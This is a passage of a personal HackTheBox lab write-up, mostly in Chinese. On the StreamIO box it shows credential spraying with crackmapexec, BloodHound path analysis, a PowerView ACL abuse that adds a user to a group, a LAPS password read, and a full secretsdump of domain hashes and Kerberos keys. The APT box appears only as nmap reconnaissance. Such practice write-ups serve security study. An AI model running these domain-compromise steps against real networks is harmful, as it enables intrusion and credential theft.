https://slack.streamio.htb:b'JDgodd',b'password@12'
# 已经破解出了一些凭据
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds | tee firefox_cracked

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2":"$4}' | tee firefox_crackedcreds 
admin:JDg0dd1s@d0p3cr3@t0r
nikk37:n1kk1sd0p3t00:)
yoshihide:paddpadd@12
JDgodd:password@12

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2}' | tee firefox_crackeduser 
admin
nikk37
yoshihide
JDgodd
            
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $4}' | tee firefox_crackedpwd
JDg0dd1s@d0p3cr3@t0r
n1kk1sd0p3t00:)
paddpadd@12
password@12
再次尝试获取smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB         streamio.htb    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         streamio.htb    445    DC               [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r 
SMB         streamio.htb    445    DC               [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec winrm streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB         streamio.htb    5985   NONE             [*] None (name:streamio.htb) (domain:None)
HTTP        streamio.htb    5985   NONE             [*] http://streamio.htb:5985/wsman
WINRM       streamio.htb    5985   NONE             [-] None\admin:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\admin:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\admin:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\admin:password@12
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:password@12
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:password@12
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:password@12

发现只有一个凭据可以使用,尝试访问smb:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H streamio.htb -u JDgodd  -p 'JDg0dd1s@d0p3cr3@t0r'                               

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.225.102:445      Name: streamio.htb              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 

没有权限访问,但这是一个有效的凭据,先保存下来
到这里,我们接下来要权限提升,又由于是在域环境中,就要按照域渗透的思路

域渗透

刚来到一个陌生的域环境中,最高效的方式就是利用bloodhound对目标域进行信息采集,然后可以分析出动态活动目录中所有的域成员、组之间的关系,以及潜在的攻击路径等

bloodhound采集域信息分析攻击路径

使用bloodhound采集器bloodhound-python之前,先要获取一个较高权限的用户,我们获取到了两个可用的用户凭据,但是没法确定哪个权限更高,但可以确定的是JDgodd是更活跃的用户,可以先尝试该用户

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# bloodhound-python -c ALL -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb -dc streamio.htb -ns 10.129.206.188 --zip
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 37S
INFO: Compressing output into 20240227142202_bloodhound.zip

将采集结果导入到bloodhound,在这之前,一定要先初始化neo4j数据库:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]                                                       
└─# neo4j restart    
。。。                                    

打开bloodhound主界面后,导入.zip文件,然后先搜索已经占用的资产,标记为owned,在该用户节点分析中直接点击寻找最短路径:
2024-02-27-14-42-11
然后将目标DC设置为ending
2024-02-27-14-45-14
可以点击路径中的方法的help查看具体利用帮助:
2024-02-27-14-46-31

bloodhound与手工采集分析域攻击路径的联系

其实bloodhound并不神秘,实际上也就是我们在域中使用手工命令采集信息手段的整合,如下:

*Evil-WinRM* PS C:\Users\nikk37\Documents> net user JDgodd
User name                    JDgodd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:56:42 AM
Password expires             Never
Password changeable          2/23/2022 1:56:42 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/26/2022 10:17:08 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\nikk37\Documents> dsget user "CN=jdgodd,CN=users,DC=streamio,DC=htb" -memberof -expand
"CN=Domain Users,CN=Users,DC=streamIO,DC=htb"
"CN=Users,CN=Builtin,DC=streamIO,DC=htb"

*Evil-WinRM* PS C:\Users\nikk37\Documents> net groups

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

# For example,we are interested in group'CORE STAFF',we want to know more details of it,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adgroup "core staff"


DistinguishedName : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
GroupCategory     : Security
GroupScope        : Global
Name              : CORE STAFF
ObjectClass       : group
ObjectGUID        : 113400d4-c787-4e58-91ad-92779b38ecc5
SamAccountName    : CORE STAFF
SID               : S-1-5-21-1470860369-1569627196-4264678630-1108

# if we want to know its acl:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access
。。。
ActiveDirectoryRights : WriteOwner
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : streamIO\JDgodd
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
。。。
# We notice this permission that interests us, and it is related to JDgodd, which is the path that bloodhound shows us.
# However, the list of results is very long, and sometimes it is not easy to locate the key information. We can filter according to the users we have obtained to see what permissions the user has in the acl of this group,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access | where-object { $_.IdentityReference -like "*jdgodd*"}


ActiveDirectoryRights : WriteOwner
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : streamIO\JDgodd
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
# In addition to acl, we also need to know what permissions a group has on computers in the domain, but before we do that, we need to know how many computers are active in the domain,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adcomputer -filter *


DistinguishedName : CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
DNSHostName       : DC.streamIO.htb
Enabled           : True
Name              : DC
ObjectClass       : computer
ObjectGUID        : 8c0f9a80-aaab-4a78-9e0d-7a4158d8b9ee
SamAccountName    : DC$
SID               : S-1-5-21-1470860369-1569627196-4264678630-1000
UserPrincipalName :
# Then we need to traverse all the OU of the DC and visit its acl one by one and associate with the core staff group,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adorganizationalunit -filter * | %{ (get-acl "Ad:$($_.distinguishedname)").access } | where-object { $_.identityreference -like "*core*"}


ActiveDirectoryRights : ReadProperty, ExtendedRight
InheritanceType       : Descendents
ObjectType            : a156e052-fb12-45bc-9a00-056271040d9f
InheritedObjectType   : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags           : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : streamIO\CORE STAFF
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : InheritOnly

ActiveDirectoryRights : ReadProperty
InheritanceType       : Descendents
ObjectType            : a0ffa854-9b42-45fa-bd07-4e1a651f2610
InheritedObjectType   : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags           : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : streamIO\CORE STAFF
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : InheritOnly
# The above shows that the core staff group can read some properties of the target dc, and we certainly hope that it can read the administrator password.Looking back, 
# we found laps when we looked at the target software, so if we can read laps, this constitutes a perfect escalation attack path, which is exactly what is shown in the bloodhound analysis chart.

所以,总结一下这条提权攻击路径,可以将用户JDgodd加入core staff组,以该组的身份读取laps

权限提升
powerview工具将用户添加到组

将用户加入到某个组中,是需要用到第三方的工具来实现的,比如powerview
地址:
https://github.com/cvestone/PowerSploit/blob/master/Recon/PowerView.ps1
将脚本下载或复制到本地,然后再通过evil-winrm上传到目标机器:

*Evil-WinRM* PS C:\programdata> upload /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1
                                        
Info: Uploading /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1 to C:\programdata\PowerView.ps1
Progress: 55% : |▓▓▓▓▒░░░░░|          
                                        
Data: 4190544 bytes of 4190544 bytes copied
                                        
Info: Upload successful!
# Then introduce the script into memory
*Evil-WinRM* PS C:\Users\nikk37\Documents> . .\powerview.ps1
# Then start to add user to group
*Evil-WinRM* PS C:\Users\nikk37\Documents> $pass =convertto-securestring 'JDg0dd1s@d0p3cr3@t0r' -AsplainText -force
*Evil-WinRM* PS C:\programdata> $cred =new-object system.management.automation.pscredential('streamio.htb\jdgodd',$pass)
*Evil-WinRM* PS C:\programdata> add-domainobjectacl -Credential $cred -Targetidentity "Core Staff" -principalIdentity "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> add-domaingroupmember -credential $cred -identity "Core Staff" -members "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> net user jdgodd
User name                    JDgodd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:56:42 AM
Password expires             Never
Password changeable          2/23/2022 1:56:42 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/29/2024 3:13:43 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *CORE STAFF
The command completed successfully.
# We make it! Now jdgodd is in the "CORE STAFF" group.

读取laps获取域管理员凭据

然后我们就可以尝试读取laps:

*Evil-WinRM* PS C:\programdata> get-adcomputer dc -properties * -credential $cred
。。。
*Evil-WinRM* PS C:\programdata> get-adcomputer -filter * -properties ms-Mcs-AdmPwd -credential $cred
。。。

如果这种方式读取不到,还有其他方式:

# First way:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ldapsearch -H ldap://10.129.170.48 -b "dc=streamio,dc=htb" -x -D jdgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCs-admpwd=*)" ms-mcs-admpwd
# extended LDIF
#
# LDAPv3
# base <dc=streamio,dc=htb> with scope subtree
# filter: (ms-MCs-admpwd=*)
# requesting: ms-mcs-admpwd 
#

# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: 7hcr@&{jI91l7M

# search reference
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

# Second way:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds                   
SMB         streamio.htb    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         streamio.htb    445    DC               [-] DC\administrator:7hcr@&{jI91l7M STATUS_LOGON_FAILURE 

我们拿到了域管理员的凭据
尝试连接:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u administrator -p '7hcr@&{jI91l7M' -i streamio.htb
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami                                                                                                                    
streamio\administrator                                                                                                                                                      
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../                                                                                                                    
*Evil-WinRM* PS C:\Users\Administrator> ls                                                                                                   
    Directory: C:\Users\Administrator                                      
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/22/2022   1:33 AM                3D Objects
d-r---        2/22/2022   1:33 AM                Contacts
d-r---        5/30/2022   4:53 PM                Desktop
d-r---        2/26/2022  12:41 PM                Documents
d-r---        2/22/2022   1:33 AM                Downloads
d-r---        2/22/2022   1:33 AM                Favorites
d-r---        2/22/2022   1:33 AM                Links
d-r---        2/22/2022   1:33 AM                Music
d-r---        2/22/2022   1:33 AM                Pictures
d-r---        2/22/2022   1:33 AM                Saved Games
d-r---        2/22/2022   1:33 AM                Searches
d-r---        2/22/2022   1:33 AM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:48 AM                .NET v4.5
d-----        2/22/2022   2:48 AM                .NET v4.5 Classic
d-----        2/26/2022  10:20 AM                Administrator
d-----         5/9/2022   5:38 PM                Martin
d-----        2/26/2022   9:48 AM                nikk37
d-r---        2/22/2022   1:33 AM                Public


*Evil-WinRM* PS C:\Users> cd martin
*Evil-WinRM* PS C:\Users\martin> cd desktop
*Evil-WinRM* PS C:\Users\martin\desktop> ls


    Directory: C:\Users\martin\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/29/2024   2:54 AM             34 root.txt
*Evil-WinRM* PS C:\Users\martin\desktop> type root.txt
b97157078aa375824e9cf9d9ac12c8eb

至此,我们最终拿到了管理员的flag

额外的小验证

那么,如何进一步验证我们拿下的就是一台域控制器呢?我们知道,如果拿下一台域控,可以做hash传递,也就是可以转储出域内的所有hash:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# /usr/share/doc/python3-impacket/examples/secretsdump.py 'streamio.htb/administrator:7hcr@&{jI91l7M'@streamio.htb
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4dbf07084a530cfa7ab417236bd4a647
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6a559f691b75bff16a07ecbd12e3bdfb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets                                                                                                                                                    
[*] $MACHINE.ACC                                                                                                                                                            
streamIO\DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def                                                                       
streamIO\DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33                                                                                                       
streamIO\DC$:des-cbc-md5:380bb370c7236ec8                                                                                                                                   
streamIO\DC$:plain_password_hex:810cfa628253e7db1ad4d299b8d385a042451764d8b8512c58d603dab8fb6255ffea028f0a02a823116d8b2c7eefff60499c6498e95827077bc5495b4dbbd8fb5fe3095afca5
5f051384ece642645a2aa18233b4d60a11a4d3ea7b29de594a8213ff23043789a3e64054bbf6cef97778d95c346e36b03b41cb32ca80bb6110bbb13d03174c8522e44b0e5da9899c0cb4a30a382990ba49fb68aecad7
83e3d56906d50b827c13a0b25701da705684f2cdc9e553b69ebe81f5012e2c221594e10df542b544d2fa9550f3941db439dba1a786fd2beb1df27376fbbeded088bb8a86830876d86b5eb155a4dfa3f2181e8e35    
streamIO\DC$:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::                                                                                           
[*] DPAPI_SYSTEM                                                                                                                                                            
dpapi_machinekey:0xd8b78bca07d4bce21bce1ae04bf231978c84407f                                                                                                                 
dpapi_userkey:0x9b682d0f5f9b63c03827113581bc2dc4f993e3ee                                                                                                                    
[*] NL$KM                                                                                                                                                                   
 0000   A5 68 6C 6F 0F D6 72 8F  9E DE A2 27 47 D1 73 3A   .hlo..r....'G.s:                                                                                                 
 0010   EA FB 23 4A 58 C9 04 91  95 A2 E7 3C 63 1A E8 B1   ..#JX......<c...                                                                                                 
 0020   DA D8 C8 95 DD 09 23 97  A5 5A 21 74 17 17 CC C6   ......#..Z!t....                                                                                                 
 0030   5E 1B F7 BE 34 99 DC 39  D1 72 7B 3E 19 B6 B2 3C   ^...4..9.r{>...<                                                                                                 
NL$KM:a5686c6f0fd6728f9edea22747d1733aeafb234a58c9049195a2e73c631ae8b1dad8c895dd092397a55a21741717ccc65e1bf7be3499dc39d1727b3e19b6b23c                                      
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                               
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                                        
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e8888d458703384be8f16508b9f9cc84:::                                                                                      
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                              
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::                                                                                             
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::                                                                                            
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::                                                                                            
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::                                                                                            
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::                                                                                         
DC$:1000:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::                                                                                               
[*] Kerberos keys grabbed                                                                                                                                                   
Administrator:aes256-cts-hmac-sha1-96:c71b0faaa98af8d80722331c61e9f727c6f9fc246f0e9acce83ed37ce5285147                                                                      
Administrator:aes128-cts-hmac-sha1-96:a14783c47207809883c1b3b003dfb553                                                                                                      
Administrator:des-cbc-md5:49b5fb4c64755829
krbtgt:aes256-cts-hmac-sha1-96:668ee76d84bf5ea1e845933ace27ecde98b736f218c0830cbe71e18812166cda
krbtgt:aes128-cts-hmac-sha1-96:f91f8540a9aca4af627959d1cb888f13
krbtgt:des-cbc-md5:d032029279fbc4fd
JDgodd:aes256-cts-hmac-sha1-96:53fcc54b04d560253b0fdb259b9de0da8c5c65916d12b5e4b5dd4723d9003443
JDgodd:aes128-cts-hmac-sha1-96:22e9e5268e40d1fc8198415fdd6c64bd
JDgodd:des-cbc-md5:76d0fe1a231934e5
Martin:aes256-cts-hmac-sha1-96:d5eed6cafcabd393a2101f4fadc143344c48ebaacb065490510ef608424065f0
Martin:aes128-cts-hmac-sha1-96:0a0cff37d02d1299a24fe58debb20392
Martin:des-cbc-md5:570bfd51e9f7e3bf
nikk37:aes256-cts-hmac-sha1-96:d4a44efe5740231cad3da85c294b01678840ac7a5b6207f366c36fc3c5b59347
nikk37:aes128-cts-hmac-sha1-96:eaff7bb14b5c41f80e5216cb09e16435
nikk37:des-cbc-md5:ae5ddf8fc2853e67
yoshihide:aes256-cts-hmac-sha1-96:0849b8c4eaee4edeaed2972752529251bbb616e9f24e08992923b4f18e9d73b0
yoshihide:aes128-cts-hmac-sha1-96:d668308ea96ebda1d31e3bb77b8e6768
yoshihide:des-cbc-md5:3bae5257ea029d61
DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def
DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33
DC$:des-cbc-md5:89d95129f7c13119
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
。。。

总结

(待复盘时总结)

APT

“红队笔记”学习记录

机器介绍

APT is an insane difficulty Windows machine where RPC and HTTP services are only exposed. Enumeration of existing RPC interfaces provides an interesting object that can be used to disclose the IPv6 address. The box is found to be protected by a firewall exemption that over IPv6 can give access to a backup share. User enumeration and bruteforce attacks can give us access to the registry which contains login credentials. The machine is configured to allow authentication via the NTLMv1 protocol, which can be leveraged to gain system access.
APT 是一个极其困难的 Windows 机器,其中仅公开 RPC 和 HTTP 服务。现有 RPC 接口的枚举提供了一个有趣的对象,可用于公开 IPv6 地址。该盒子受到防火墙豁免的保护,可以通过 IPv6 访问备份共享。用户枚举和暴力攻击可以让我们访问包含登录凭据的注册表。该计算机配置为允许通过 NTLMv1 协议进行身份验证,可利用该协议来获取系统访问权限。

难度

Insane

信息搜集

tcp全端口扫描

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 14:59 CST
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc

Nmap done: 1 IP address (1 host up) scanned in 46.32 seconds

处理信息:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports=$(grep open nmapscan/tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports
80,135

tcp详细扫描

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT -sC -sV -O -p80,135 $ip1 -oA nmapscan/tcpdetails 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:05 CST
Nmap scan report for 10.129.96.60
Host is up (0.21s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds

udp扫描

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sU -p- --min-rate 10000 10.129.96.60 -oA nmapscan/udports      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:10 CST
Nmap scan report for 10.129.96.60
Host is up (0.14s latency).
All 65535 scanned ports on 10.129.96.60 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 14.26 seconds

没有扫描出任何结果

脚本漏扫

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap --script=vuln -p80,135 10.129.96.60 -oA nmapscan/vuln 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:08 CST
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 15:10 (0:00:02 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:12 (0:00:01 remaining)
Stats: 0:06:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:14 (0:00:02 remaining)
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).

PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.96.60
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.129.96.60:80/support.html
|     Form id: 
|_    Form action: https://10.13.38.16/contact-post.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp open  msrpc

Nmap done: 1 IP address (1 host up) scanned in 741.60 seconds

扫描结果分析

我们扫描出的结果很有限,显然优先访问80端口的web服务寻找潜在的漏洞,最后才是考虑msrpc

利用

尝试访问web服务

2024-03-02-15-20-50
